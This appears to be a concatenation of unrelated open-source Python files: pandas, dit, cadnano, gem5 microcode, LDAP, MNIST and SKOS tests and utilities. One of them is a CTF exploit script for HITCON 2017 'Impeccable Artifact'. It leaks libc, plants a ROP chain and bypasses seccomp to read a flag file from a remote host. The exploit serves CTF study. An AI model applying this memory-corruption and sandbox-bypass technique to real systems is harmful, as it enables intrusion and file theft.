a q 20 4 0.4473 1.4152 0.2834 1.00661 0.1744
x q 30 3 -0.6662 -0.5243 -0.3580 0.89145 2.5838"""
parser = python_parser_only
expected = DataFrame(
[
[-0.5109, -2.3358, -0.4645, 0.05076, 0.3640],
[0.4473, 1.4152, 0.2834, 1.00661, 0.1744],
[-0.6662, -0.5243, -0.3580, 0.89145, 2.5838],
],
columns=["A", "B", "C", "D", "E"],
index=MultiIndex.from_tuples(
[("a", "b", 10.0032, 5), ("a", "q", 20, 4), ("x", "q", 30, 3)],
names=["one", "two", "three", "four"],
),
)
result = parser.read_csv(StringIO(data), sep=r"\s+")
tm.assert_frame_equal(result, expected)
def test_read_csv_buglet_4x_multi_index2(python_parser_only):
# see gh-6893
data = " A B C\na b c\n1 3 7 0 3 6\n3 1 4 1 5 9"
parser = python_parser_only
expected = DataFrame.from_records(
[(1, 3, 7, 0, 3, 6), (3, 1, 4, 1, 5, 9)],
columns=list("abcABC"),
index=list("abc"),
)
result = parser.read_csv(StringIO(data), sep=r"\s+")
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("add_footer", [True, False])
def test_skipfooter_with_decimal(python_parser_only, add_footer):
# see gh-6971
data = "1#2\n3#4"
parser = python_parser_only
expected = DataFrame({"a": [1.2, 3.4]})
if add_footer:
# The stray footer line should not mess with the
# casting of the first two lines if we skip it.
kwargs = {"skipfooter": 1}
data += "\nFooter"
else:
kwargs = {}
result = parser.read_csv(StringIO(data), names=["a"], decimal="#", **kwargs)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"sep", ["::", "#####", "!!!", "123", "#1!c5", "%!c!d", "@@#4:2", "_!pd#_"]
)
@pytest.mark.parametrize(
"encoding", ["utf-16", "utf-16-be", "utf-16-le", "utf-32", "cp037"]
)
def test_encoding_non_utf8_multichar_sep(python_parser_only, sep, encoding):
# see gh-3404
expected = DataFrame({"a": [1], "b": [2]})
parser = python_parser_only
data = "1" + sep + "2"
encoded_data = data.encode(encoding)
result = parser.read_csv(
BytesIO(encoded_data), sep=sep, names=["a", "b"], encoding=encoding
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("quoting", [csv.QUOTE_MINIMAL, csv.QUOTE_NONE])
def test_multi_char_sep_quotes(python_parser_only, quoting):
# see gh-13374
kwargs = {"sep": ",,"}
parser = python_parser_only
data = 'a,,b\n1,,a\n2,,"2,,b"'
if quoting == csv.QUOTE_NONE:
msg = "Expected 2 fields in line 3, saw 3"
with pytest.raises(ParserError, match=msg):
parser.read_csv(StringIO(data), quoting=quoting, **kwargs)
else:
msg = "ignored when a multi-char delimiter is used"
with pytest.raises(ParserError, match=msg):
parser.read_csv(StringIO(data), quoting=quoting, **kwargs)
def test_none_delimiter(python_parser_only, capsys):
# see gh-13374 and gh-17465
parser = python_parser_only
data = "a,b,c\n0,1,2\n3,4,5,6\n7,8,9"
expected = DataFrame({"a": [0, 7], "b": [1, 8], "c": [2, 9]})
# We expect the third line in the data to be
# skipped because it is malformed, but we do
# not expect any errors to occur.
result = parser.read_csv(StringIO(data), header=0, sep=None, on_bad_lines="warn")
tm.assert_frame_equal(result, expected)
captured = capsys.readouterr()
assert "Skipping line 3" in captured.err
@pytest.mark.parametrize("data", ['a\n1\n"b"a', 'a,b,c\ncat,foo,bar\ndog,foo,"baz'])
@pytest.mark.parametrize("skipfooter", [0, 1])
def test_skipfooter_bad_row(python_parser_only, data, skipfooter):
# see gh-13879 and gh-15910
parser = python_parser_only
if skipfooter:
msg = "parsing errors in the skipped footer rows"
with pytest.raises(ParserError, match=msg):
parser.read_csv(StringIO(data), skipfooter=skipfooter)
else:
msg = "unexpected end of data|expected after"
with pytest.raises(ParserError, match=msg):
parser.read_csv(StringIO(data), skipfooter=skipfooter)
def test_malformed_skipfooter(python_parser_only):
parser = python_parser_only
data = """ignore
A,B,C
1,2,3 # comment
1,2,3,4,5
2,3,4
footer
"""
msg = "Expected 3 fields in line 4, saw 5"
with pytest.raises(ParserError, match=msg):
parser.read_csv(StringIO(data), header=1, comment="#", skipfooter=1)
|
rs2/pandas
|
pandas/tests/io/parser/test_python_parser_only.py
|
Python
|
bsd-3-clause
| 9,378
| 0.000746
|
"""
The I_downarrow unique measure, proposed by Griffith et al, and shown to be inconsistent.
The idea is to measure unique information as the intrinsic mutual information between
and source and the target, given the other sources. It turns out that these unique values
are inconsistent, in that they produce differing redundancy values.
"""
from ..pid import BaseUniquePID
from ...multivariate.secret_key_agreement import (
no_communication_skar,
one_way_skar,
two_way_skar,
)
from ...utils import flatten
__all__ = (
'PID_SKAR_nw',
'PID_SKAR_owa',
'PID_SKAR_owb',
'PID_SKAR_tw',
)
class PID_SKAR_nw(BaseUniquePID):
"""
The two-way secret key agreement rate partial information decomposition.
Notes
-----
This method progressively utilizes better bounds on the SKAR, and if even when using
the tightest bounds does not result in a singular SKAR, nan is returned.
"""
_name = "I_>-<"
@staticmethod
def _measure(d, sources, target, niter=25, bound=None):
"""
This computes unique information as S(X_0 >-< Y || X_1).
Parameters
----------
d : Distribution
The distribution to compute I_SKAR for.
sources : iterable of iterables
The source variables.
target : iterable
The target variable.
Returns
-------
i_skar_nw : dict
The value of I_SKAR_nw for each individual source.
"""
uniques = {}
for source in sources:
others = list(sources)
others.remove(source)
others = list(flatten(others))
uniques[source] = no_communication_skar(d, source, target, others)
return uniques
class PID_SKAR_owa(BaseUniquePID):
"""
The one-way secret key agreement rate partial information decomposition,
source to target.
"""
_name = "I_>->"
@staticmethod
def _measure(d, sources, target, niter=25, bound=None):
"""
This computes unique information as S(X_0 >-> Y || X_1).
Parameters
----------
d : Distribution
The distribution to compute I_SKAR for.
sources : iterable of iterables
The source variables.
target : iterable
The target variable.
Returns
-------
i_skar_owa : dict
The value of I_SKAR_owa for each individual source.
"""
uniques = {}
for source in sources:
others = list(sources)
others.remove(source)
others = list(flatten(others))
uniques[source] = one_way_skar(d, source, target, others)
return uniques
class PID_SKAR_owb(BaseUniquePID):
"""
The one-way secret key agreement rate partial information decomposition,
target to source.
"""
_name = "I_<-<"
@staticmethod
def _measure(d, sources, target, niter=25, bound=None):
"""
This computes unique information as S(X_0 <-< Y || X_1).
Parameters
----------
d : Distribution
The distribution to compute I_SKAR for.
sources : iterable of iterables
The source variables.
target : iterable
The target variable.
Returns
-------
i_skar_owb : dict
The value of I_SKAR_owb for each individual source.
"""
uniques = {}
for source in sources:
others = list(sources)
others.remove(source)
others = list(flatten(others))
uniques[source] = one_way_skar(d, target, source, others)
return uniques
class PID_SKAR_tw(BaseUniquePID):
"""
The two-way secret key agreement rate partial information decomposition.
Notes
-----
This method progressively utilizes better bounds on the SKAR, and if even when using
the tightest bounds does not result in a singular SKAR, nan is returned.
"""
_name = "I_<->"
@staticmethod
def _measure(d, sources, target, niter=25, bound=None):
"""
This computes unique information as S(X_0 <-> Y || X_1), when possible.
Parameters
----------
d : Distribution
The distribution to compute I_SKAR for.
sources : iterable of iterables
The source variables.
target : iterable
The target variable.
Returns
-------
i_skar_tw : dict
The value of I_SKAR_tw for each individual source.
"""
uniques = {}
for source in sources:
others = list(sources)
others.remove(source)
others = list(flatten(others))
uniques[source] = two_way_skar(d, [source, target], others)
return uniques
|
dit/dit
|
dit/pid/measures/iskar.py
|
Python
|
bsd-3-clause
| 4,845
| 0.001032
|
# To run:
# pytest -c cadnano/tests/pytestgui.ini cadnano/tests/
import pytest
from PyQt5.QtCore import Qt, QPointF
from PyQt5.QtTest import QTest
from cadnano.fileio.lattice import HoneycombDnaPart
from cadnano.views.sliceview import slicestyles
from cnguitestcase import GUITestApp
@pytest.fixture()
def cnapp():
app = GUITestApp()
yield app
app.tearDown()
DELAY = 5 # milliseconds
RADIUS = slicestyles.SLICE_HELIX_RADIUS
####################### Standard Functional Tests ########################
def testCreateVirtualHelixGui(cnapp):
"""Create some VHs"""
# Create a new Honeycomb part
toolbar = cnapp.window.main_toolbar
action_new_honeycomb = toolbar.widgetForAction(cnapp.window.action_new_dnapart_honeycomb)
QTest.mouseClick(action_new_honeycomb, Qt.LeftButton, delay=DELAY)
slicerootitem = cnapp.window.views['slice'].root_item
assert len(slicerootitem.instance_items) == 1
slice_part_item = list(slicerootitem.instance_items.values())[0]
QTest.keyClick(cnapp.window, Qt.Key_H, delay=DELAY)
QTest.keyClick(cnapp.window, Qt.Key_C, delay=DELAY)
cnapp.processEvents()
cmd_count = 1 # already added the part
for row in range(-2, 2):
for col in range(-2, 2):
# print(row, col)
x, y = HoneycombDnaPart.latticeCoordToModelXY(RADIUS, row, col)
pt = QPointF(x, y)
cnapp.graphicsItemClick(slice_part_item, Qt.LeftButton, pos=pt, delay=DELAY)
cmd_count += 1
cnapp.processEvents()
vh_count = len(cnapp.document.activePart().getidNums())
# undo and redo all
for i in range(cmd_count):
cnapp.document.undoStack().undo()
cnapp.processEvents()
for i in range(cmd_count):
cnapp.document.undoStack().redo()
cnapp.processEvents()
part = list(cnapp.document.children())[0]
vh_count_after_redo = len(part.getidNums())
assert vh_count == vh_count_after_redo
# import time
# time.sleep(3)
# end def
|
scholer/cadnano2.5
|
cadnano/tests/functionaltest_gui.py
|
Python
|
mit
| 1,997
| 0.001502
|
# Copyright (c) 2007-2008 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
def macroop RET_NEAR
{
# Make the default data size of rets 64 bits in 64 bit mode
.adjust_env oszIn64Override
ld t1, ss, [1, t0, rsp]
# Check address of return
addi rsp, rsp, dsz
wripi t1, 0
};
def macroop RET_NEAR_I
{
# Make the default data size of rets 64 bits in 64 bit mode
.adjust_env oszIn64Override
limm t2, imm
ld t1, ss, [1, t0, rsp]
# Check address of return
addi rsp, rsp, dsz
add rsp, rsp, t2
wripi t1, 0
};
def macroop RET_FAR {
.adjust_env oszIn64Override
# Get the return RIP
ld t1, ss, [1, t0, rsp]
# Get the return CS
ld t2, ss, [1, t0, rsp], ssz
# Get the rpl
andi t3, t2, 0x3
# Get the cpl
# Here we'd check if we're changing priviledge levels. We'll just hope
# that doesn't happen yet.
# Do stuff if they're equal
andi t0, t2, 0xFC, flags=(EZF,), dataSize=2
br label("processDescriptor"), flags=(CEZF,)
andi t3, t2, 0xF8, dataSize=8
andi t0, t2, 0x4, flags=(EZF,), dataSize=2
br label("globalDescriptor"), flags=(CEZF,)
ld t3, tsl, [1, t0, t3], dataSize=8
br label("processDescriptor")
globalDescriptor:
ld t3, tsg, [1, t0, t3], dataSize=8
processDescriptor:
chks t2, t3, IretCheck, dataSize=8
# There should be validity checks on the RIP checks here, but I'll do
# that later.
wrdl cs, t3, t2
wrsel cs, t2
wrip t0, t1
br label("end")
# Do other stuff if they're not.
end:
fault "NoFault"
};
'''
|
aferr/LatticeMemCtl
|
src/arch/x86/isa/insts/general_purpose/control_transfer/xreturn.py
|
Python
|
bsd-3-clause
| 3,641
| 0
|
import unittest
from plow.ldapadaptor import LdapAdaptor
class FakeLA(LdapAdaptor):
def bind(self, *args):
""" Nothing to see here move along """
initialize = bind
class Test_Ldap_DN_Compare(unittest.TestCase):
def setUp(self):
self.ldap_case_i = FakeLA("uri", "base", case_insensitive_dn=True)
self.ldap_case_s = FakeLA("uri", "base")
def _do_compare(self, ref, other, res, case_sensitive=True):
if case_sensitive:
match = self.ldap_case_s.compare_dn(ref, other)
else:
match = self.ldap_case_i.compare_dn(ref, other)
if res:
self.assertTrue(
match,
"Expected '{0}' to match '{1}' (Case Sensitive: {2})".format(ref, other, case_sensitive),
)
else:
self.assertFalse(
match,
"'{0}' and '{1}' should not match (Case Sensitive: {2})".format(ref, other, case_sensitive),
)
def test_basic(self):
self._do_compare("CN=Test", "CN=test", False, case_sensitive=True)
self._do_compare("CN=Test", "CN=test", True, case_sensitive=False)
def test_spaces(self):
self._do_compare("CN=Test, OU=Base", "CN=Test,OU=Base", True)
self._do_compare(" CN = Test,OU = Base ", "CN=Test,OU=Base", True)
self._do_compare(" CN = Te st ", "CN=Te st", True)
if __name__ == '__main__':
unittest.main()
|
veloutin/plow
|
plow/tests/test_dn_compare.py
|
Python
|
lgpl-3.0
| 1,458
| 0.003429
|
# Script used to create Mnist_mini and Mnist_full datasets.
import numpy as np
from sklearn.datasets import fetch_mldata
from pandas import DataFrame
# Default download location for caching is
# ~/scikit_learn_data/mldata/mnist-original.mat unless specified otherwise.
mnist = fetch_mldata('MNIST original')
# Create DataFrame, group data by class.
df = DataFrame(mnist.data)
df['class'] = mnist.target
grouped = df.groupby('class')
# Write data feature values to file in Dataset directory by class.
for name, group in grouped:
# Create mini binary MNIST classification dataset for faster testing.
if int(name) < 2:
fname = 'Dataset/Mnist_mini/Class' + str(int(name)) + '.txt'
np.savetxt(fname=fname, X=group[:200], fmt='%d',delimiter='\t',newline='\n')
# Create full MNIST classification for full application.
fname = 'Dataset/Mnist_full/Class' + str(int(name)) + '.txt'
np.savetxt(fname=fname, X=group, fmt='%d', delimiter='\t', newline='\n')
|
Sumukh/ParallelRF
|
mnist.py
|
Python
|
gpl-3.0
| 959
| 0.01147
|
# -*- coding: utf-8 -*-
"""Checks/fixes are bundled in one namespace."""
import logging
from rdflib.namespace import RDF, SKOS
from .rdftools.namespace import SKOSEXT
from .rdftools import localname, find_prop_overlap
def _hierarchy_cycles_visit(rdf, node, parent, break_cycles, status):
if status.get(node) is None:
status[node] = 1 # entered
for child in sorted(rdf.subjects(SKOS.broader, node)):
_hierarchy_cycles_visit(
rdf, child, node, break_cycles, status)
status[node] = 2 # set this node as completed
elif status.get(node) == 1: # has been entered but not yet done
if break_cycles:
logging.warning("Hierarchy cycle removed at %s -> %s",
localname(parent), localname(node))
rdf.remove((node, SKOS.broader, parent))
rdf.remove((node, SKOS.broaderTransitive, parent))
rdf.remove((node, SKOSEXT.broaderGeneric, parent))
rdf.remove((node, SKOSEXT.broaderPartitive, parent))
rdf.remove((parent, SKOS.narrower, node))
rdf.remove((parent, SKOS.narrowerTransitive, node))
else:
logging.warning(
"Hierarchy cycle detected at %s -> %s, "
"but not removed because break_cycles is not active",
localname(parent), localname(node))
elif status.get(node) == 2: # is completed already
pass
def hierarchy_cycles(rdf, fix=False):
"""Check if the graph contains skos:broader cycles and optionally break these.
:param Graph rdf: An rdflib.graph.Graph object.
:param bool fix: Fix the problem by removing any skos:broader that overlaps
with skos:broaderTransitive.
"""
top_concepts = sorted(rdf.subject_objects(SKOS.hasTopConcept))
status = {}
for cs, root in top_concepts:
_hierarchy_cycles_visit(
rdf, root, None, fix, status=status)
# double check that all concepts were actually visited in the search,
# and visit remaining ones if necessary
recheck_top_concepts = False
for conc in sorted(rdf.subjects(RDF.type, SKOS.Concept)):
if conc not in status:
recheck_top_concepts = True
_hierarchy_cycles_visit(
rdf, conc, None, fix, status=status)
return recheck_top_concepts
def disjoint_relations(rdf, fix=False):
"""Check if the graph contains concepts connected by both of the semantically
disjoint semantic skos:related and skos:broaderTransitive (S27),
and optionally remove the involved skos:related relations.
:param Graph rdf: An rdflib.graph.Graph object.
:param bool fix: Fix the problem by removing skos:related relations that
overlap with skos:broaderTransitive.
"""
for conc1, conc2 in sorted(rdf.subject_objects(SKOS.related)):
if conc2 in sorted(rdf.transitive_objects(conc1, SKOS.broader)):
if fix:
logging.warning(
"Concepts %s and %s connected by both "
"skos:broaderTransitive and skos:related, "
"removing skos:related",
conc1, conc2)
rdf.remove((conc1, SKOS.related, conc2))
rdf.remove((conc2, SKOS.related, conc1))
else:
logging.warning(
"Concepts %s and %s connected by both "
"skos:broaderTransitive and skos:related, "
"but keeping it because keep_related is enabled",
conc1, conc2)
def hierarchical_redundancy(rdf, fix=False):
"""Check for and optionally remove extraneous skos:broader relations.
:param Graph rdf: An rdflib.graph.Graph object.
:param bool fix: Fix the problem by removing skos:broader relations between
concepts that are otherwise connected by skos:broaderTransitive.
"""
for conc, parent1 in sorted(rdf.subject_objects(SKOS.broader)):
for parent2 in sorted(rdf.objects(conc, SKOS.broader)):
if parent1 == parent2:
continue # must be different
if parent2 in rdf.transitive_objects(parent1, SKOS.broader):
if fix:
logging.warning(
"Eliminating redundant hierarchical relationship: "
"%s skos:broader %s",
conc, parent2)
rdf.remove((conc, SKOS.broader, parent2))
rdf.remove((conc, SKOS.broaderTransitive, parent2))
rdf.remove((parent2, SKOS.narrower, conc))
rdf.remove((parent2, SKOS.narrowerTransitive, conc))
else:
logging.warning(
"Redundant hierarchical relationship "
"%s skos:broader %s found, but not eliminated "
"because eliminate_redundancy is not set",
conc, parent2)
def preflabel_uniqueness(rdf, policy='all'):
"""Check that concepts have no more than one value of skos:prefLabel per
language tag (S14), and optionally move additional values to skos:altLabel.
:param Graph rdf: An rdflib.graph.Graph object.
:param str policy: Policy for deciding which value to keep as prefLabel
when multiple prefLabels are found. Possible values are 'shortest'
(keep the shortest label), 'longest' (keep the longest label),
'uppercase' (prefer uppercase), 'lowercase' (prefer uppercase) or
'all' (keep all, just log the problems). Alternatively, a list of
policies to apply in order, such as ['shortest', 'lowercase'], may
be used.
"""
resources = set(
(res for res, label in rdf.subject_objects(SKOS.prefLabel)))
policy_fn = {
'shortest': len,
'longest': lambda x: -len(x),
'uppercase': lambda x: int(x[0].islower()),
'lowercase': lambda x: int(x[0].isupper())
}
if type(policy) not in (list, tuple):
policies = policy.split(',')
else:
policies = policy
for p in policies:
if p not in policy_fn:
logging.critical("Unknown preflabel-policy: %s", policy)
return
def key_fn(label):
return [policy_fn[p](label) for p in policies] + [str(label)]
for res in sorted(resources):
prefLabels = {}
for label in rdf.objects(res, SKOS.prefLabel):
lang = label.language
if lang not in prefLabels:
prefLabels[lang] = []
prefLabels[lang].append(label)
for lang, labels in prefLabels.items():
if len(labels) > 1:
if policies[0] == 'all':
logging.warning(
"Resource %s has more than one prefLabel@%s, "
"but keeping all of them due to preflabel-policy=all.",
res, lang)
continue
chosen = sorted(labels, key=key_fn)[0]
logging.warning(
"Resource %s has more than one prefLabel@%s: "
"choosing %s (policy: %s)",
res, lang, chosen, str(policy))
for label in labels:
if label != chosen:
rdf.remove((res, SKOS.prefLabel, label))
rdf.add((res, SKOS.altLabel, label))
def label_overlap(rdf, fix=False):
"""Check if concepts have the same value for any two of the pairwise
disjoint properties skos:prefLabel, skos:altLabel and skos:hiddenLabel
(S13), and optionally remove the least significant property.
:param Graph rdf: An rdflib.graph.Graph object.
:param bool fix: Fix the problem by removing the least significant property
(altLabel or hiddenLabel).
"""
def label_warning(res, label, keep, remove):
if fix:
logging.warning(
"Resource %s has '%s'@%s as both %s and %s; removing %s",
res, label, label.language, keep, remove, remove
)
else:
logging.warning(
"Resource %s has '%s'@%s as both %s and %s",
res, label, label.language, keep, remove
)
for res, label in find_prop_overlap(rdf, SKOS.prefLabel, SKOS.altLabel):
label_warning(res, label, 'prefLabel', 'altLabel')
if fix:
rdf.remove((res, SKOS.altLabel, label))
for res, label in find_prop_overlap(rdf, SKOS.prefLabel, SKOS.hiddenLabel):
label_warning(res, label, 'prefLabel', 'hiddenLabel')
if fix:
rdf.remove((res, SKOS.hiddenLabel, label))
for res, label in find_prop_overlap(rdf, SKOS.altLabel, SKOS.hiddenLabel):
label_warning(res, label, 'altLabel', 'hiddenLabel')
if fix:
rdf.remove((res, SKOS.hiddenLabel, label))
|
NatLibFi/Skosify
|
skosify/check.py
|
Python
|
mit
| 8,938
| 0.000224
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
context(arch='amd64', os='linux', aslr=False, terminal=['tmux', 'neww'])
env = {'LD_PRELOAD': './libc.so.6'}
if args['GDB']:
io = gdb.debug(
'./artifact-amd64-2.24-9ubuntu2.2',
env=env,
gdbscript='''\
set follow-fork-mode parent
b *0x555555554ba6
c
''')
elf, libc = io.elf, ELF('libs/amd64/2.24/9ubuntu2.2/libc-2.24.so')
elif args['REMOTE']:
io = remote('52.192.178.153', 31337)
elf, libc = ELF('./artifact'), ELF('libs/amd64/2.24/9ubuntu2.2/libc-2.24.so')
else:
io = process('./artifact-amd64-2.24-9ubuntu2.2', env=env)
elf, libc = io.elf, ELF('libs/amd64/2.24/9ubuntu2.2/libc-2.24.so')
# the binary allows reading and writing to arbitrary locations
# the tricky part was finding how to bypass the seccomp rules
# enforced with prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, ...), since
# the "official" tool to disassemble BPF bytecode provided by libseccomp doesn't handle
# the BPF_X opcode correctly (and shows wrong rules)
# luckily, https://github.com/niklasb/dump-seccomp seems to extract the correct rules:
# prctl(PR_SET_NO_NEW_PRIVS)
# prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, ...)
# fprog @ 00007fffffffdd70
# 20 blocks @ 00007fffffffdd80
# Disassembly:
# l0: ld [4]
# l1: jeq #0xc000003e, l2, l18
# l2: ld [32]
# l3: tax
# l4: ld [0]
# l5: jeq #0, l19, l6
# l6: jeq #0x1, l19, l7
# l7: jeq #0x5, l19, l8
# l8: jeq #0x8, l19, l9
# l9: jeq #0x9, l11, l10
# l10: jeq #0xa, l11, l14
# l11: txa
# l12: and #0x1
# l13: jeq #0x1, l18, l19
# l14: jeq x, l19, l15
# l15: jeq #0xc, l19, l16
# l16: jeq #0x3c, l19, l17
# l17: jeq #0xe7, l19, l18
# l18: ret #0
# l19: ret #0x7fff0000
# at l14, syscalls in which rax == rdx are allowed to run: this means
# we can execute open(..., ..., 2)
# find the address of libc
io.recvuntil('Choice?\n')
io.sendline('1')
io.recvuntil('Idx?\n')
index = 0x650 / 8 + 1
io.sendline(str(index))
a_libc_address = int(io.recvline()[len('Here it is: '):])
libc.address = a_libc_address - 0x0000000000020300 - 241
success('libc.address: %s' % hex(libc.address))
# find any writeable location
buf = libc.address + 0x3c1800
# read a filename into buf, open the file, read its content and write it back
rop = ROP(libc)
rop.read(0, buf, 5)
rop.open(buf, 0, 2)
rop.read(3, buf, 50)
rop.write(1, buf, 50)
# set up the ROP chain in the stack
raw_rop = str(rop)
for i, address in enumerate([u64(raw_rop[i:i + 8]) for i in range(0, len(raw_rop), 8)]):
print 'Sending', i
io.recvuntil('Choice?\n')
io.sendline('2')
io.recvuntil('Idx?\n')
index = 0x650 / 8 + 1 + i
io.sendline(str(index))
io.recvuntil('Give me your number:\n')
io.sendline(str(address))
# exit to trigger ROP execution
io.recvuntil('Choice?\n')
io.sendline('3')
sleep(0.1)
io.send('flag\x00')
io.interactive()
# $ ./artifact.py REMOTE
# [+] Opening connection to 52.192.178.153 on port 31337: Done
# [*] '/home/ubuntu/vbox/artifact-4c4375825c4a08ae9d14492b34b3bddd/artifact'
# Arch: amd64-64-little
# RELRO: Full RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
# [*] '/home/ubuntu/vbox/artifact-4c4375825c4a08ae9d14492b34b3bddd/libc.so.6'
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
# [+] libc.address: 0x7fed4d6ab000
# [*] Loaded cached gadgets for './libc.so.6'
# Sending 0
# Sending 1
# . . .
# Sending 30
# Sending 31
# [*] Switching to interactive mode
# hitcon{why_libseccomp_cheated_me_Q_Q}
|
integeruser/on-pwning
|
2017-hitcon-quals/Impeccable-Artifact/artifact.py
|
Python
|
mit
| 3,733
| 0.001072
|
"""Tests for letsencrypt_apache.parser."""
import os
import shutil
import unittest
import augeas
import mock
from letsencrypt import errors
from letsencrypt_apache.tests import util
class BasicParserTest(util.ParserTest):
"""Apache Parser Test."""
def setUp(self): # pylint: disable=arguments-differ
super(BasicParserTest, self).setUp()
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.config_dir)
shutil.rmtree(self.work_dir)
def test_find_config_root_no_root(self):
# pylint: disable=protected-access
os.remove(self.parser.loc["root"])
self.assertRaises(
errors.NoInstallationError, self.parser._find_config_root)
def test_parse_file(self):
"""Test parse_file.
letsencrypt.conf is chosen as the test file as it will not be
included during the normal course of execution.
"""
file_path = os.path.join(
self.config_path, "not-parsed-by-default", "letsencrypt.conf")
self.parser._parse_file(file_path) # pylint: disable=protected-access
# search for the httpd incl
matches = self.parser.aug.match(
"/augeas/load/Httpd/incl [. ='%s']" % file_path)
self.assertTrue(matches)
def test_find_dir(self):
test = self.parser.find_dir("Listen", "80")
# This will only look in enabled hosts
test2 = self.parser.find_dir("documentroot")
self.assertEqual(len(test), 1)
self.assertEqual(len(test2), 4)
def test_add_dir(self):
aug_default = "/files" + self.parser.loc["default"]
self.parser.add_dir(aug_default, "AddDirective", "test")
self.assertTrue(
self.parser.find_dir("AddDirective", "test", aug_default))
self.parser.add_dir(aug_default, "AddList", ["1", "2", "3", "4"])
matches = self.parser.find_dir("AddList", None, aug_default)
for i, match in enumerate(matches):
self.assertEqual(self.parser.aug.get(match), str(i + 1))
def test_add_dir_to_ifmodssl(self):
"""test add_dir_to_ifmodssl.
Path must be valid before attempting to add to augeas
"""
from letsencrypt_apache.parser import get_aug_path
# This makes sure that find_dir will work
self.parser.modules.add("mod_ssl.c")
self.parser.add_dir_to_ifmodssl(
get_aug_path(self.parser.loc["default"]),
"FakeDirective", ["123"])
matches = self.parser.find_dir("FakeDirective", "123")
self.assertEqual(len(matches), 1)
self.assertTrue("IfModule" in matches[0])
def test_add_dir_to_ifmodssl_multiple(self):
from letsencrypt_apache.parser import get_aug_path
# This makes sure that find_dir will work
self.parser.modules.add("mod_ssl.c")
self.parser.add_dir_to_ifmodssl(
get_aug_path(self.parser.loc["default"]),
"FakeDirective", ["123", "456", "789"])
matches = self.parser.find_dir("FakeDirective")
self.assertEqual(len(matches), 3)
self.assertTrue("IfModule" in matches[0])
def test_get_aug_path(self):
from letsencrypt_apache.parser import get_aug_path
self.assertEqual("/files/etc/apache", get_aug_path("/etc/apache"))
def test_set_locations(self):
with mock.patch("letsencrypt_apache.parser.os.path") as mock_path:
mock_path.isfile.side_effect = [False, False]
# pylint: disable=protected-access
results = self.parser._set_locations()
self.assertEqual(results["default"], results["listen"])
self.assertEqual(results["default"], results["name"])
@mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg")
def test_update_runtime_variables(self, mock_cfg):
mock_cfg.return_value = (
'ServerRoot: "/etc/apache2"\n'
'Main DocumentRoot: "/var/www"\n'
'Main ErrorLog: "/var/log/apache2/error.log"\n'
'Mutex ssl-stapling: using_defaults\n'
'Mutex ssl-cache: using_defaults\n'
'Mutex default: dir="/var/lock/apache2" mechanism=fcntl\n'
'Mutex watchdog-callback: using_defaults\n'
'PidFile: "/var/run/apache2/apache2.pid"\n'
'Define: TEST\n'
'Define: DUMP_RUN_CFG\n'
'Define: U_MICH\n'
'Define: TLS=443\n'
'Define: example_path=Documents/path\n'
'User: name="www-data" id=33 not_used\n'
'Group: name="www-data" id=33 not_used\n'
)
expected_vars = {"TEST": "", "U_MICH": "", "TLS": "443",
"example_path": "Documents/path"}
self.parser.update_runtime_variables()
self.assertEqual(self.parser.variables, expected_vars)
@mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg")
def test_update_runtime_vars_bad_output(self, mock_cfg):
mock_cfg.return_value = "Define: TLS=443=24"
self.parser.update_runtime_variables()
mock_cfg.return_value = "Define: DUMP_RUN_CFG\nDefine: TLS=443=24"
self.assertRaises(
errors.PluginError, self.parser.update_runtime_variables)
@mock.patch("letsencrypt_apache.constants.os_constant")
@mock.patch("letsencrypt_apache.parser.subprocess.Popen")
def test_update_runtime_vars_bad_ctl(self, mock_popen, mock_const):
mock_popen.side_effect = OSError
mock_const.return_value = "nonexistent"
self.assertRaises(
errors.MisconfigurationError,
self.parser.update_runtime_variables)
@mock.patch("letsencrypt_apache.parser.subprocess.Popen")
def test_update_runtime_vars_bad_exit(self, mock_popen):
mock_popen().communicate.return_value = ("", "")
mock_popen.returncode = -1
self.assertRaises(
errors.MisconfigurationError,
self.parser.update_runtime_variables)
class ParserInitTest(util.ApacheTest):
def setUp(self): # pylint: disable=arguments-differ
super(ParserInitTest, self).setUp()
self.aug = augeas.Augeas(
